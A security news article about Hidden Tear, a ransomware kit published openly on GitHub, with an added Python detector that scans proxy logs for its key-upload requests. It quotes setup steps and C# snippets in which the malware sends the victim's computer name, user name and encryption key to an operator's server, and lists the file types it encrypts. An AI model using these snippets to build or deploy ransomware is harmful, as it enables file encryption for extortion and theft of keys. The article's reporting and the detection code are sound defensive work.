A Turkish security researcher named Utku Sen has published fully functional ransomware source code on the open-source code-sharing website GitHub.
The ransomware, dubbed Hidden Tear, uses AES encryption to lock files before displaying a ransom message telling users to pay up.
The currently undetectable version of the ransomware can be modified and deployed as needed, as it contains every feature a cybercriminal would expect from modern malware.
Sen describes his Ransomware as "a ransomware-like file crypter sample which can be modified for specific purposes." This means even script kiddies can now develop their own Ransomware to threaten people.
The Hidden Tear — Free Ransomware Kit
The "Hidden Tear" Ransomware package consists of four files namely:
Hidden Tear Ransomware is capable of:
- Using AES algorithm to encrypt files
- Sending encryption key to a server
- Encrypting files and decrypting them using a decrypter program with the encryption key
- Creating a text file on the Desktop with a given message
- Small file size (12 KB)
- Evading detection by all standard anti-virus programs
How to Setup your Custom Ransomware Using Hidden Tear?
Sen has specified usage details as well. He says:
1. You need to have a web server that supports scripting languages such as PHP or Python. Then change the below-mentioned line with your URL. (Better use HTTPS connection in order to avoid eavesdropping):
string targetURL = "https://www.example.com/hidden-tear/write.php?info=";
2. The script should write the GET parameter to a text file. Sending process running in SendPassword() function:
string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);
3. Target file extensions can also be changed. Default list:
var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
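For defenders, the key upload in step 2 leaves a recognizable request in web proxy logs, and because the decrypter needs that key, the logged value is also worth preserving for recovery. The following is an added example, not part of Sen's project or the original article: it scans constructed proxy log lines for GET requests whose info parameter has the computerName-userName key shape. The log format, the inventory mapping, and the names find_beacons, SAMPLE_LOG and INVENTORY are assumptions, and it presumes the proxy records full URLs.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed proxy log lines (time, client IP, method, URL); not real traffic.
SAMPLE_LOG = """\
2015-08-18T09:12:01Z 10.0.0.21 GET https://www.example.com/hidden-tear/write.php?info=WS-ACCT-07-jdoe%20Xq7pL2mZr9TgB4k
2015-08-18T09:12:05Z 10.0.0.21 GET https://intranet.example.org/search?info=printer-setup
2015-08-18T09:13:40Z 10.0.0.99 GET https://cdn.example.net/a.php?info=LAB-PC3-alice%20p0Yw8sKd3nVb6Qe
2015-08-18T09:14:02Z 10.0.0.40 POST https://www.example.com/form.php?info=HOST-bob%20secretvalue123
"""

# Hypothetical asset inventory mapping client IP to computer name.
INVENTORY = {"10.0.0.21": "WS-ACCT-07", "10.0.0.40": "HOST"}

# Shape of the value built in step 2: <computerName>-<userName><space><key>.
# The minimum key length of 8 is an assumption used to cut false positives.
BEACON = re.compile(r"^(?P<prefix>\S+-\S+) (?P<key>\S{8,})$")


def find_beacons(log_text, inventory):
    """Return one alert dict per GET request whose info= value has the beacon shape."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) != 4:
            continue
        ts, client, method, url = parts
        target = urlsplit(url)
        if method != "GET" or not target.query.startswith("info="):
            continue
        # The quoted code appends the value without URL-encoding it, so treat
        # everything after "info=" as the value instead of splitting on "&".
        value = unquote(target.query[len("info="):])
        match = BEACON.match(value)
        if not match:
            continue
        host = inventory.get(client)
        # Higher confidence when the value starts with the sender's own computer name.
        own_name = bool(host) and match["prefix"].upper().startswith(host.upper() + "-")
        hits.append({"time": ts, "client": client, "dest": target.netloc,
                     "key": match["key"], "confidence": "high" if own_name else "medium"})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG, INVENTORY):
        print(hit)
```

The match is on the parameter shape rather than the URL path, since the quoted instructions tell the operator to substitute their own server URL.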
For Educational Purpose... REALLY!
Wait! Sen has something more to say, listening to which you might think...REALLY!!
With the whole project "Hidden Tear," there's an attached legal warning that says:
"While this may be helpful for some, there are significant risks. The 'Hidden Tear' may be used only for 'Educational Purposes.' Do not use it as a Ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent."
Somebody should ask him: why instigate people to commit a crime? One can imagine what such "Educational Purposes" amount to, as there's a big chance of this ransomware showing up in attacks.
The video demonstration of the sandbox testing of 'Hidden Tear' gives a real picture of what it is capable of doing.
How to Protect Yourself from Ransomware Threat?
Two months ago, we introduced you to a free Ransomware Decryption and Malware Removal ToolKit that could help you deal with various variants of ransomware as well as help you unlock encrypted files without paying the cyber crooks.
However, there are some important steps that should be considered to protect yourself from Ransomware threats.
- Always keep regular backups of your important data.
- Make sure you run an active anti-virus security suite of tools on your system.
- Do not open email attachments from unknown sources.
- Most importantly, always browse the Internet safely.
To keep yourself safe, we also have an excellent article on How to protect your computer from ransomware malware?